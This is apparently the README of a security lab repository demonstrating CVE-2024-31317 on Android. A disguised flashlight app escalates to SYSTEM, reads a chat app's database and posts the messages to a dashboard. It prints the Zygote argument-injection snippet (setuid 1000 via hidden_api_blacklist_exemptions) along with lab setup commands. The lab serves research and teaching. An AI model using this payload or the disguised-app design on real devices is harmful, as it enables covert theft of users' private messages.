This lab demonstrates CVE-2024-31317, a critical Android vulnerability that allows a malicious app to escalate privileges to SYSTEM level (UID 1000) and bypass the Android sandbox to read data from other applications in real-time.
| Stage | Description | Visual |
|---|---|---|
| 1 | User installs innocent-looking "Flashlight Pro" app | 🔦 |
| 2 | App exploits CVE-2024-31317 to gain SYSTEM access | 💉 |
| 3 | SYSTEM-level service reads "SecureChat" messages | 👁️ |
| 4 | Stolen messages appear on live dashboard | 📊 |
ZygoteExploitDemo/
├── 📱 apps/
│ ├── SecureChat/ # Victim app (Jetpack Compose)
│ │ ├── Encrypted messages stored in SQLite
│ │ └── Simulates WhatsApp-style encryption
│ │
│ ├── FlashlightPro/ # Malicious app with exploit
│ │ ├── Normal flashlight UI (distraction)
│ │ ├── Background exploit service
│ │ └── WRITE_SECURE_SETTINGS permission
│ │
│ └── MonitorService/ # SYSTEM-level reader
│ ├── Runs with UID 1000 after exploit
│ ├── Reads SecureChat database
│ └── Exfiltrates to dashboard
│
├── 📊 dashboard/ # Flask web dashboard
│ └── app.py # Shows stolen messages live
│
├── 📜 scripts/ # Automation scripts
│ ├── setup_vulnerable_emulator.sh
│ ├── build_all_apps.sh
│ ├── install_all_apps.sh
│ ├── run_exploit.py
│ └── monitor_logs.sh
│
├── 🎯 exploits/ # Exploit information
│ ├── CVE-2024-31317.md
│ └── payloads.txt
│
└── 📁 tamplates/ # Code templates
├── exploit_template.java
└── dashboard_template.html
CVE-2024-31317 exists in how Android's Zygote process handles the hidden_api_blacklist_exemptions system setting. Due to missing input sanitization, an attacker can inject newline characters to add arbitrary arguments to Zygote commands.
Attack Vector:
Settings.Global.putString(
contentResolver,
"hidden_api_blacklist_exemptions",
"LClass1;->method1(\n" +
"7\n" +
"--setuid=1000\n" + // Run as SYSTEM
"--setgid=1000\n" + // Run as SYSTEM group
"--invoke-with\n" +
"am start-service ...;\n"
);| Version | Status |
|---|---|
| Android 9 - 14 | ❌ Vulnerable (pre-June 2024 patch) |
| Android 14+ | ✅ Patched (June 2024 security update) |
| Android 15+ | ✅ Secure |
- ✅ Android Studio (latest)
- ✅ Python 3.8+ with Flask
- ✅ Android SDK with platform tools
- ✅ 10GB free disk space for emulator
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemocd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh
# Start the emulator
emulator -avd vulnerable_android_12# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.shcd ../dashboard
pip3 install flask flask-cors
python3 app.py📱 Open http://localhost:5000 in your browser
cd ../scripts
python3 run_exploit.py- Open SecureChat app in emulator
- Send some test messages
- Watch them appear on the dashboard instantly! 🔴
🎬 Demo video coming soon
- FlashlightPro requests
WRITE_SECURE_SETTINGSpermission - Exploit code injects malicious payload into Zygote settings
- Zygote spawns MonitorService with SYSTEM privileges (UID 1000)
- SYSTEM service bypasses Android sandbox restrictions
- Direct database read from
/data/data/com.securechat/databases/ - Exfiltration to Flask dashboard via HTTP POST
- Real-time display of stolen encrypted messages
Contributions are welcome! Please:
- Fork the repository
- Create a feature branch
- Submit a Pull Request
Areas for contribution:
- 🎯 Additional exploit payloads
- 🛡️ Better detection methods
- 📖 Improved documentation
- 🌍 Translation to other languages
MIT License - See LICENSE file for details
Aman - @GitAmanS
If you found this educational, please give it a star! ⭐
Made for security researchers, by a security researcher
Remember: With great power comes great responsibility 🕷️